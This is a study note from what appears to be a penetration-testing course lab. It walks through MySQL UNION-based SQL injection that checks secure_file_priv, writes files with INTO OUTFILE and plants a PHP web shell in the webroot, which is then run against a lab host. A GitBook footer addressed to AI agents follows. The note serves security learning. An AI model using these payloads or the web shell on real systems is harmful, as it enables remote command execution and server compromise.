# Writing Files

## S**ecure\_file\_priv**

```sql
SHOW VARIABLES LIKE 'secure_file_priv';
```

The final SQL query is the following:

```sql
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
```

So, similar to other `UNION` injection queries, we can get the above query result with the following payload. Remember to add two more columns `1` & `4` as junk data to have a total of 4 columns':

```sql
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
```

<figure><img src="/files/uvsK3nhHAgNG6rFfzZKw" alt=""><figcaption></figcaption></figure>

And the result shows that the `secure_file_priv` value is empty, meaning that we can read/write files to any location.

## SELECT INTO OUTFILE

To use it, we can add `INTO OUTFILE '...'` after our query to export the results into the file we specified. The below example saves the output of the `users` table into the `/tmp/credentials` file:

```shell-session
SELECT * from users INTO OUTFILE '/tmp/credentials';
```

If we go to the back-end server and `cat` the file, we see that table's content:

```shell-session
eldeim@htb[/htb]$ cat /tmp/credentials 
1       admin   392037dbba51f692776d6cefb6dd546d
2       newuser 9da2c9bcdf39d8610954e0e11ea8f45f
```

It is also possible to directly `SELECT` strings into files, allowing us to write arbitrary files to the back-end server.

```sql
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
```

When we `cat` the file, we see that text:

```shell-session
eldeim@htb[/htb]$ cat /tmp/test.txt 
this is a test
```

## Writing Files through SQL Injection

Let's try writing a text file to the webroot and verify if we have write permissions. The below query should write `file written successfully!` to the `/var/www/html/proof.txt` file, which we can then access on the web application:

```sql
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
```

> To read the server configuration, like Apache's configuration found at `/etc/apache2/apache2.conf`, Nginx's configuration at `/etc/nginx/nginx.conf`, or IIS configuration at `%WinDir%\System32\Inetsrv\Config\ApplicationHost.config.`
>
> Or we can search online for other possible configuration locations. Furthermore, we may run a fuzzing scan and try to write files to different possible web roots, using [this wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or [this wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt).

The `UNION` injection payload would be as follows:

```sql
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
```

<figure><img src="/files/e1SWLB0SLagIcHf1AA4Y" alt=""><figcaption></figcaption></figure>

We don’t see any errors on the page, which indicates that the query succeeded. Checking for the file `proof.txt` in the webroot, we see that it indeed exists: `http://SERVER_IP:PORT/proof.txt`

<figure><img src="/files/W7aprBEBQuiWl76d0eir" alt=""><figcaption></figcaption></figure>

### Writing a Web Shell

```php
<?php system($_REQUEST[0]); ?>
```

We can reuse our previous `UNION` injection payload, and change the string to the above, and the file name to `shell.php`:

```sql
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
```

<figure><img src="/files/SlydzNoWCtg8URe3WcCx" alt=""><figcaption></figcaption></figure>

Once again, we don't see any errors, which means the file write probably worked. This can be verified by browsing to the `/shell.php` file and executing commands via the `0` parameter, with `?0=id` in our URL: `http://SERVER_IP:PORT/shell.php?0=id`

<figure><img src="/files/YpgzsDeKdfj0FQSty01e" alt=""><figcaption></figcaption></figure>

## WriteUp

```
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
```

<figure><img src="/files/UYRbID1DQCtNFxUYBLwy" alt=""><figcaption></figcaption></figure>

```
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
```

<figure><img src="/files/CcuQLZjUMDxTvPAvVJBZ" alt=""><figcaption></figcaption></figure>

Now target to `http://83.136.252.13:50193/shell.php?0=id`

<figure><img src="/files/3id8HPvb3gN568r7HmPO" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/sql-injection/exploitation/writing-files.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.